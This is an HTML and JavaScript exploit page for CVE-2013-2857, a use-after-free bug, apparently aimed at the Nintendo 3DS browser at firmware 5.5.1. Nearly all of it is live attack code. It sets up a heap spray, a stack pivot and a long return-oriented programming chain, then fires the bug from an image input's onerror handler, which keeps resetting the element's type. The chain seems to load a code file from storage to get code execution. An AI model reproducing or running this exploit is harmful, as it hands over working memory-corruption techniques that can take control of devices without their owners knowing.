<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
-->
<script>
function UaF3(a)
{
	var bsize=0x2000000;
	var p = new ArrayBuffer(bsize); 
	var payload = new Uint32Array(p);

	payload[(0x1ba000+0x18)/4]=0x09300000;
	payload[(0x1ba000)/4]=0x09300000;
	payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
	payload[(0x1ba000-0x4)/4]=0x001df60c;	//POP_PC   (pivot pc)
	payload[(0x1ba000-0x8)/4]=0x44444444;	//GARBAGE  (lr)
	payload[(0x1ba000-0xC)/4]=0x09310000;	//ROP_ADDR (pivot sp)

	var rop=[  				/* Generated from: https://github.com/yellows8/3ds_browserhax_common */
		0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x0100FFFF,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x00202A04,0x09320000,
		0x00000004,0x00000000,0x00000000,0x00000000,0x00000000,0x00298304,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x00011000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00D1042C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x636D6473,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320004,
		0x0000003A,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00000000,0x00318D30,0x0026276C,0x00000000,0x0027B150,0x001DF7F0,0x001DF7F0,0x09320000,0x0A000000,0x00000000,0x00800000,0x00000000,0x00000000,0x00000000,0x002634DC,0x00000001,
		0x00000000,0x00000000,0x00000008,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000014,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00D1042C,0x0030C328,0x09320010,0x00640073,0x0063006D,0x002F003A,0x00720061,0x0031006D,0x00630031,0x0064006F,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,
		0x0932002C,0x002E0065,0x00690062,0x0000006E,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,
		0x09320040,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320040,0x00000001,0x00000000,0x00000000,
		0x00000000,0x00000000,0x003222E4,0x0026276C,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320020,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x0030C44C,
		0x0026276C,0x00000000,0x00296E64,0x09320000,0x0027B150,0x001DF60C,0x001F7A04,0x0027B150,0x001DF60C,0x001DCDD0,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x001EC780,
		0x0027B150,0x001DF60C,0x001DF7F0,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0029DADC,0x0030C328,0x09320010,0x00000000,0x001F1FAC,0x00000000,
		0x00000000,0x00000000,0x00000000,0x001EAAFC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x002A2498,0x0029DADC,0x003222E4,0x001EC780,0x001F1FDC,
		0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,
		0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x0030C44C,0x00327258,0x00298304,0x00000000,0x00000000,0x00000048,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,
		0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x003E03D0,0x00000114,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,
		0x001DF7F0,0x3A45C030,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x3A45D000,0x0063A738,0x00D11044,0x00D10BA4,
		0x00D111B4,0x00D10BAC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C060,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,
		0x0027B150,0x001DF7F0,0x001DF7F0,0x3A45D000,0x3B1336E0,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x002A2498,0x00000000,0x00000000,0x00000000,0x00000008,0x00000000,
		0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3B9ACA00,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x002D8CD4,0x0027B150,0x001DF60C,0x001DF7F0,
		0x09320000,0x01808080,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF7F0,0x001DF7F0,0x00202A04,0x09320000,0x00000004,0x00000000,0x00000000,
		0x00000000,0x00000000,0x00298304,0x3A45C000,0x0FFF9000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x0055B6E0,0x70707070
	]

	for(var i=0; i < rop.length; i++) payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
	
	for(var i=0;i<1000;i++){
		var buf = new ArrayBuffer(0x18);
		var bufView = new Uint32Array(buf);
		bufView[0]=0x11131100;
		bufView[1]=0x09300000; //r5
		bufView[2]=0x39010018; //r6
		bufView[3]=0x44161400;
		bufView[4]=0xffffffff;
		bufView[5]=0x66181600;
		a.type="hidden";
	}
}
</script>
<input type="image" onerror="UaF3(this);" src=""/>